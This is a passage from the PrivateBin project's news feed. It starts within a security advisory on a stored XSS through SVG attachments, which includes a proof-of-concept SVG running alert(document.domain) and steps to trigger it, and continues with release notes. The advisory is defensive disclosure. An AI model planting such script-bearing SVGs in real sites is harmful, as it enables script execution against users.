&lt;span class="nt"&gt;&amp;lt;svg&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="na"&gt;version=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;1.1&amp;quot;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="na"&gt;baseProfile=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;full&amp;quot;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="na"&gt;xmlns=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;http://www.w3.org/2000/svg&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;polygon&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="na"&gt;id=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;triangle&amp;quot;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="na"&gt;points=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;0,0 0,50 50,0&amp;quot;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="na"&gt;fill=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;#009900&amp;quot;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="na"&gt;stroke=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;#004400&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;/&amp;gt;&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;script&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="na"&gt;type=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;text/javascript&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="w"&gt;   &lt;/span&gt;alert(document.domain);
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/svg&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Upload it as an attachment to a PrivateBin instance that has attachments enabled and hasn't set the recommended content security policy (in particular, one that has either no content security policy set or that allows &lt;code&gt;*&lt;/code&gt; or &lt;code&gt;blob:&lt;/code&gt; as a &lt;code&gt;script-src&lt;/code&gt;).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;Open the paste. (In a real attack scenario this would be done by the victim.)&lt;/li&gt;
&lt;li&gt;The SVG is rendered safely as a preview, and script isn't yet executed.&lt;/li&gt;
&lt;li&gt;Now (depending on your device) right-click or long tap on the image and open it in a new tab.&lt;/li&gt;
&lt;li&gt;Now a &lt;code&gt;blob:&lt;/code&gt; URI opens in a new tab with the image and the modal is shown, therefore the script got executed.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;We tried to reproduce the vulnerability and in our assessment, we found out the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Any users who use our recommended &lt;em&gt;Content Security Policy&lt;/em&gt; (CSP), even older, less strict ones, are &lt;strong&gt;not affected&lt;/strong&gt; by this vulnerability, if a &lt;a href="https://caniuse.com/contentsecuritypolicy"&gt;CSP compatible browser&lt;/a&gt; is used. All the browsers we tested with did pass on the CSP to the new tab that is opened when viewing the SVG by itself.&lt;br&gt;
  As PrivateBin ships with a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#cspheader"&gt;built-in CSP&lt;/a&gt;, we consider this a strong defence in depth against these and related issues. That said, we think the CSP should only be the last layer of defence and as such, we decided to still apply further mitigations for this security issue.&lt;/li&gt;
&lt;li&gt;Instances that do not have attachments enabled, are not affected. Even when attachments are uploaded using a third-party client, they can't be rendered when the administrator disables them (the HTML element that they would render in isn't present and before 1.4 this caused an error, we now catch the error and only display the paste text) and thus potential exploits in the attachment file do not apply.&lt;/li&gt;
&lt;li&gt;The inline preview (step 4 above) does &lt;em&gt;not&lt;/em&gt; execute the script, because &lt;a href="https://developer.mozilla.org/en-US/docs/Web/SVG/SVG_as_an_Image#restrictions"&gt;browsers explicitly restrict SVGs if the they are is embedded in an &lt;code&gt;img&lt;/code&gt; tag&lt;/a&gt; to prevent such security issues in images. Thus, &lt;a href="https://www.w3.org/TR/CSP2/#which-policy-applies"&gt;SVGs in &lt;code&gt;img&lt;/code&gt; tags itself can be considered safe&lt;/a&gt;.
  However, when the user opens the SVG in a new tab, this browser security feature is circumvented. That's why the exploit steps above explain to open the SVG in a new tab. That being said, the impact of the vulnerability is reduced by two factors:&lt;ol&gt;
&lt;li&gt;The attack explicitly requires &lt;strong&gt;user-interaction&lt;/strong&gt;, i.e. the user has to be tricked into opening the preview in a new tab for some reason. This could realistically be achieved with some social engineering: The markdown formatted text part of the paste could include such an instruction as a big, bold title, or the SVG could be very large and have very small text, which the user might want to zoom into, in order to read.&lt;/li&gt;
&lt;li&gt;Potential exploit code can only run in a new tab. It still has the same origin (as can be seen in the PoC above, because the domain/origin the script is running on, is shown). However, though, sensitive information like the paste content, potential comments or encryption key (in the URL) is not accessible to the attacker as the context is now a blob-URL – and would anyway consist mostly of things the attacker initially created itself.&lt;br&gt;
  That said, &lt;a href="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy"&gt;the same origin policy applies&lt;/a&gt; and thus, what an attacker could do is read e.g. cookies and local storage data saved in the same origin. As PrivateBin itself does not use any of that, the impact of this vulnerability is limited. However, as PrivateBin is a software for self-hosting, it cannot be excluded that other services run in the same origin (e.g. on the same domain). That's why server administrators may need to evaluate the impact of running arbitrary JavaScript code on their domain/origin where PrivateBin is hosted by themselves.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To summarize, this shows a fairly limited impact, given even if the CSP had not caught the issue, the user still needs to interact with the page and the exploit code cannot access or exfiltrate any data of the PrivateBin instance.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; However, take our assessment only as a basis for your own assessment. As explained, depending on your environment, the actual risk may vary if you are hosting other services on the same domain as PrivateBin.&lt;/p&gt;
&lt;p&gt;As for the metrics, the impact assessment we have done with &lt;a href="https://nvd.nist.gov/vuln-metrics/cvss"&gt;CVSS v3.1&lt;/a&gt; results in this:
&lt;a href="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:F/RL:U/RC:C/CR:X/IR:X/AR:X/MAV:N/MAC:L/MPR:N/MUI:R/MS:U/MC:X/MI:X/MA:X&amp;amp;version=3.1"&gt;AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:F/RL:U/RC:C/CR:X/IR:X/AR:X/MAV:N/MAC:L/MPR:N/MUI:R/MS:U/MC:X/MI:X/MA:X&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Real-life impact&lt;/h3&gt;
&lt;p&gt;We found two affected instances in our instance lists (wiki, directory) that did not serve a correct Content Security Policy header, had attachments enabled and thus are vulnerable to this attack. We didn't manage to get into contact with the administrators of these sites, though.&lt;/p&gt;
&lt;p&gt;In addition to that, we found that multiple instances do seem to either strip our CSP or have it changed to an unsafe setting and have thus expanded our directory service to verify whether our recommend CSP is used or not. (see below)&lt;/p&gt;
&lt;p&gt;We have no reports that indicate this vulnerability was or is being actively exploited at the time of this report.&lt;/p&gt;
&lt;h2&gt;Patches&lt;/h2&gt;
&lt;p&gt;To fix the problem, we took the following measures (in no particular order):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We apply &lt;a href="https://github.com/cure53/DOMPurify/"&gt;DOMpurify&lt;/a&gt; (a library we already use to sanitize user-submitted HTML via the Markdown format) to the SVG preview, too. It strips script tags and other uncommon security-relevant and potentially malicious tags/properties from the SVG file.
  So whether you open the SVG in a new tab or not and whether CSP is present and enabled or not does not matter any more, as the displayed SVG is sanitized.&lt;/li&gt;
&lt;li&gt;As a further defence in depth mechanism we now send the CSP both as an HTTP header, as well as a meta tag. This protects instance with  mis-configured web servers, CDNs, proxy or similar, from stripping or breaking the CSP headers, as they still get the CSP inside of the HTML content itself. Please note though, that the &lt;a href="https://content-security-policy.com/examples/meta/"&gt;meta tag approach is not as strong as the HTTP header approach&lt;/a&gt; and should thus only be considered as a fallback.&lt;/li&gt;
&lt;li&gt;The &lt;a href="https://privatebin.info/"&gt;PrivateBin Directory&lt;/a&gt; now also scans whether the recommend Content-Security-Policy header is used on a given instance. If you do not want to have your website appear in the list, but check it manually &lt;a href="https://privatebin.info/directory/check"&gt;you can use a separate check page&lt;/a&gt; there.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The code-changes in PrivateBin can be found in https://github.com/PrivateBin/PrivateBin/pull/906.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Please note that we explicitly chose to &lt;em&gt;not&lt;/em&gt; apply &lt;em&gt;DOMPurify&lt;/em&gt; if you download the (SVG) attachment with the download button. Subsequently, if a user would manually opens the downloaded SVG in the browser, it will be opened from the &lt;code&gt;file://&lt;/code&gt; protocol and thus from a &lt;a href="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy"&gt;different origin&lt;/a&gt;, so all reference to the download location is lost and no more security risk is associated with that, than opening any website or local HTML file. Thus, the SVG file with stay intact in it's original form, if you download the attachment.&lt;/p&gt;
&lt;p&gt;We consider the execution of code from attachments outside of the PrivateBin instance's context to be out of scope to mitigate (i.e. malware in executables, office documents macros, PDF scripts), as all of these require client side mitigations to be applied to all such downloaded file types, independent on where they get downloaded from.&lt;/p&gt;
&lt;h2&gt;Workarounds&lt;/h2&gt;
&lt;p&gt;We strongly recommend you to upgrade to our latest release, especially as we also upgraded outdated and potential vulnerable libraries (see below). However, here are two workarounds that may help you to mitigate this vulnerability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Update the &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#cspheader"&gt;CSP in your configuration file&lt;/a&gt; to the latest recommended settings and check that it isn't getting reverted or overwritten by your web server, reverse proxy or CDN, i.e. using &lt;a href="https://privatebin.info/directory/check"&gt;our offered check service&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Deploying PrivateBin on a separate domain may limit the scope of the vulnerability to PrivateBin itself and thus, as described in the “Impact” section, effectively prevent any damage by the vulnerability to other resources you are hosting.&lt;/li&gt;
&lt;li&gt;As explained in the impact assessment, disabling attachments also prevents this issue.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;p&gt;We highly encourage server administrators and others involved with the PrivateBin project to read-up on how Content-Security-Policies work, especially should you consider to manually adjust it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;https://content-security-policy.com/&lt;/li&gt;
&lt;li&gt;https://developer.mozilla.org/docs/Web/HTTP/CSP&lt;/li&gt;
&lt;li&gt;https://developers.google.com/web/fundamentals/security/csp/&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Also please note that if multiple headers are set (as e.g. done via our now introduced meta tag) &lt;a href="https://stackoverflow.com/a/51153816/5008962"&gt;browsers should apply the most restrictive set of the policies&lt;/a&gt;, &lt;a href="https://www.w3.org/TR/CSP2/#enforcing-multiple-policies"&gt;as per the CSP specification&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;For more information&lt;/h2&gt;
&lt;p&gt;Please notice we also upgraded &lt;a href="https://github.com/PrivateBin/PrivateBin/pull/880"&gt;jQuery&lt;/a&gt; that was reported to us as being vulnerable both by &lt;a href="https://github.com/PrivateBin/docker-nginx-fpm-alpine/issues/69#issue-1006943396"&gt;our automated container security scanning&lt;/a&gt; as well as &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/864"&gt;by users&lt;/a&gt;.
By doing so, we also updated all &lt;a href="https://github.com/PrivateBin/PrivateBin/pull/888"&gt;other dependencies we use&lt;/a&gt;. Our tooling identified the following vulnerabilities in jQuery:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CVE-2020-11023&lt;/li&gt;
&lt;li&gt;CVE-2020-11022&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In &lt;a href="https://github.com/PrivateBin/docker-nginx-fpm-alpine/issues/69#issuecomment-928261418"&gt;a limited assessment about these when we were made aware of them&lt;/a&gt; we could not find any immediate risk, but nevertheless, we encourage users to upgrade to be on the safe side.&lt;/p&gt;
&lt;p&gt;Finally, we also &lt;a href="https://github.com/PrivateBin/PrivateBin/pull/909"&gt;upgraded zlib&lt;/a&gt; to address CVE-2018-25032.&lt;/p&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;2022-02-22 – Initial contact by reporter.&lt;/li&gt;
&lt;li&gt;2022-02-25 – Reporter sends in a detailed report.&lt;/li&gt;
&lt;li&gt;2022-02-26 – Report gets reviewed, initial findings around the content security get shared and reporter withdraws report.&lt;/li&gt;
&lt;li&gt;2022-04-09 – Vulnerability details published.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;This vulnerability was reported by Ian Budd, &lt;a href="https://www.nethemba.com/"&gt;Nethemba s.r.o&lt;/a&gt;, which we'd like to thank for that.&lt;/p&gt;
&lt;p&gt;In general, we'd like to thank everyone reporting issues and potential vulnerabilities to us.&lt;/p&gt;
&lt;p&gt;If you think you have found a vulnerability or potential security risk, &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/SECURITY.md"&gt;we'd kindly ask you to follow our security policy&lt;/a&gt; and report it to us. We then assess the report and will take the actions we deem necessary to address it.&lt;/p&gt;</content><category term="Reports"/><category term="PrivateBin"/><category term="Security"/></entry><entry><title>Release v1.3.5 - Fixing several smaller issues, adding new translations</title><link href="https://privatebin.info/news/v1.3.5-release.html" rel="alternate"/><published>2021-04-05T20:00:00+02:00</published><updated>2021-04-05T20:00:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2021-04-05:/news/v1.3.5-release.html</id><summary type="html">&lt;p&gt;This release fixes a number of smaller issues and adds new translations.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release fixes a number of smaller issues and adds new translations.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This bug fix releases addresses a number of smaller issues and regressions, adds four new translations and includes updated libraries. Links in pastes now by default open in a new browser tab or window. The project information text and link is now a configuration option.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;We recommend to upgrade 1.3.x instances to address these issues.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;p&gt;If you have enabled the &lt;code&gt;fileupload&lt;/code&gt; setting and use a custom &lt;code&gt;cspheader&lt;/code&gt;, please consider adding &lt;code&gt;allow-downloads&lt;/code&gt; to the &lt;code&gt;sandbox&lt;/code&gt; property. This lets users of the Google Chrome browser, version 83 or higher, download attachments - inline display of images, media or PDFs files was not affected by this change in Chrome's sandbox behaviour.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.3.4&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Translation for Hebrew, Lithuanian, Indonesian and Catalan&lt;/li&gt;
&lt;li&gt;ADDED: Make the project info configurable (#681)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 2.2.7, kjua 0.9.0 &amp;amp; random_compat 2.0.18&lt;/li&gt;
&lt;li&gt;CHANGED: Open all links in new window (#630)&lt;/li&gt;
&lt;li&gt;FIXED: PDF display in Firefox (#630)&lt;/li&gt;
&lt;li&gt;FIXED: Allow pasting into password input dialog (#630)&lt;/li&gt;
&lt;li&gt;FIXED: Display of expiration date in email (#630)&lt;/li&gt;
&lt;li&gt;FIXED: Allow display of durations in weeks (#630)&lt;/li&gt;
&lt;li&gt;FIXED: Avoid exposing burn-after-reading messages from cache (#630)&lt;/li&gt;
&lt;li&gt;FIXED: Only display the dropzone when it should (#630)&lt;/li&gt;
&lt;li&gt;FIXED: Detect delete token properly (#630)&lt;/li&gt;
&lt;li&gt;FIXED: Sanitize output from &lt;code&gt;Helper.urls2links()&lt;/code&gt; (#630)&lt;/li&gt;
&lt;li&gt;FIXED: Avoid recreation of existing pasteurl element when calling URL shortener (#630)&lt;/li&gt;
&lt;li&gt;FIXED: Downloads in Chrome &amp;gt;= 83 (#634)&lt;/li&gt;
&lt;li&gt;FIXED: Display of empty files (#663)&lt;/li&gt;
&lt;li&gt;FIXED: Improve OpenGraph attributes (#651)&lt;/li&gt;
&lt;li&gt;FIXED: Reset to configured burn-after-reading, discussion and expiration settings (#682)&lt;/li&gt;
&lt;li&gt;FIXED: Italic segment of project information (#756)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools that should get you started.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;The next regular release will focus on &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.3.4 - Fixing HTML entities, custom expiration, pasting into password field</title><link href="https://privatebin.info/news/v1.3.4-release.html" rel="alternate"/><published>2020-03-22T09:00:00+01:00</published><updated>2020-03-22T09:00:00+01:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2020-03-22:/news/v1.3.4-release.html</id><summary type="html">&lt;p&gt;This release fixes HTML entities, custom expiration and pasting into password field.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release fixes HTML entities, custom expiration and pasting into password field.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This bug fix releases resolves further HTML entity encoding issues, the use of custom expiration options in the email function, pasting into the password dialog on pastes with attachments and also updates the identicon library to 2.0.0, which increases the minimum required PHP version to 5.6.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;We recommend to upgrade 1.3.x instances to address these issues.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.3.3&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;CHANGED: Minimum required PHP version is 5.6, due to a change in the identicon library and to use php's native hash_equals()&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: identicon 2.0.0&lt;/li&gt;
&lt;li&gt;FIXED: Support custom expiration options in email function (#586)&lt;/li&gt;
&lt;li&gt;FIXED: Regression with encoding of HTML entities (#588)&lt;/li&gt;
&lt;li&gt;FIXED: Unable to paste password on paste with attachment (#565 &amp;amp; #595)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools that should get you started.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;The next regular release will focus on &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.3.3 &amp; v1.2.3 - Fixing HTML entity double encoding issues introduced in 1.3.2 &amp; 1.2.2</title><link href="https://privatebin.info/news/v1.3.3-v1.2.3-release.html" rel="alternate"/><published>2020-02-16T12:00:00+01:00</published><updated>2020-02-16T12:00:00+01:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2020-02-16:/news/v1.3.3-v1.2.3-release.html</id><summary type="html">&lt;p&gt;This release fixes HTML entity double encoding issues introduced in versions 1.3.2 and 1.2.2 of PrivateBin.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release fixes HTML entity double encoding issues introduced in versions 1.3.2 and 1.2.2 of PrivateBin.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In the efforts to prevent the unencoded strings to cause XSS issues down the line in releases 1.3.2 and 1.2.2, we had some strings getting their HTML entities encoded twice. This caused some display glitches as well as preventing the URLs in paste texts to get converted to links.&lt;/p&gt;
&lt;p&gt;This bug fix releases resolves these encoding issues, expands the XSS protection to the server side templating, updates some missing translation strings for the mailing feature (in 1.3.3 only) and also updates the DOMpurify library to 2.0.8.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;We recommend to upgrade 1.3, 1.3.1, 1.3.2, 1.2, 1.2.1 and 1.2.2 instances to address these issues.&lt;/p&gt;
&lt;p&gt;We do offer a backport of these fixes for the 1.2.x versions of PrivateBin. You may choose to use version 1.2.3 over 1.3.3, if you do need to support legacy browsers with incomplete or missing Webcrypto API, like IE, non-Chromium based Edge or some ESR releases.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;h2&gt;Changes&lt;/h2&gt;
&lt;h3&gt;in 1.3.3 since version 1.3.2&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 2.0.8&lt;/li&gt;
&lt;li&gt;CHANGED: Several translations got updated with missing messages&lt;/li&gt;
&lt;li&gt;CHANGED: Introduce HTML entity encoding on server side (#581)&lt;/li&gt;
&lt;li&gt;FIXED: HTML entity double encoding issues introduced in 1.3.2 (#560)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;in 1.2.3 since version 1.2.2&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 2.0.8&lt;/li&gt;
&lt;li&gt;CHANGED: Introduce HTML entity encoding on server side (#581)&lt;/li&gt;
&lt;li&gt;FIXED: HTML entity double encoding issues introduced in 1.3.2 (#560)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools that should get you started.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;The next regular release will focus on &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.3.2 &amp; v1.2.2 - Fix for persistent XSS vulnerability in filenames of attached files</title><link href="https://privatebin.info/news/v1.3.2-v1.2.2-release.html" rel="alternate"/><published>2020-01-11T15:00:00+01:00</published><updated>2020-01-11T15:00:00+01:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2020-01-11:/news/v1.3.2-v1.2.2-release.html</id><summary type="html">&lt;p&gt;This release fixes a persistent XSS vulnerability in filenames of attached files in PrivateBin.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release fixes a persistent XSS vulnerability in filenames of attached files in PrivateBin.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;On 25th of December 2019, an issue was discovered and fixed, which allowed the user provided attachment file name to inject HTML under certain conditions, leading to a persistent &lt;a href="https://en.wikipedia.org/wiki/Cross-site_scripting"&gt;Cross-site scripting (XSS)&lt;/a&gt; vulnerability. This release includes an improved solution, which addresses the issue on a broader scope, avoiding this to reoccur in other areas of the code in the future.&lt;/p&gt;
&lt;p&gt;Further details on this is an issue and its implications can be found in our &lt;a href="https://privatebin.info/reports/vulnerability-2020-01-11.html"&gt;report on the vulnerability&lt;/a&gt;. It also describes methods to check if your browser is currently affected by the issue. If it is, please consider updating your browser.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;We recommend to upgrade 1.3, 1.3.1, 1.2 and 1.2.1 instances to address this issue, even if the instance doesn't have fileuploads enabled and uses the recommended CSP header to mitigate XSS attacks.&lt;/p&gt;
&lt;p&gt;Due to the seriousness of the issue, we do offer a backport of the fix for the 1.2.1 version of PrivateBin, that also includes updated JavaScript libraries. You may choose to use that version over 1.3.2, if you do need to support legacy browsers with incomplete or missing Webcrypto API, like IE, non-Chromium based Edge or some ESR releases.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;h2&gt;Changes&lt;/h2&gt;
&lt;h3&gt;in 1.3.2 since version 1.3.1&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Translation for Ukrainian (#533)&lt;/li&gt;
&lt;li&gt;ADDED: Option to send a mail with the link, when creating a paste (#398)&lt;/li&gt;
&lt;li&gt;ADDED: Add support for CONFIG_PATH environment variable (#552)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: base-x 3.0.7, DOMpurify 2.0.7 &amp;amp; Showdown 1.9.1&lt;/li&gt;
&lt;li&gt;FIXED: HTML injection via unescaped attachment filename (#554)&lt;/li&gt;
&lt;li&gt;FIXED: Password disabling option (#527)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;in 1.2.2 since version 1.2.1&lt;/h3&gt;
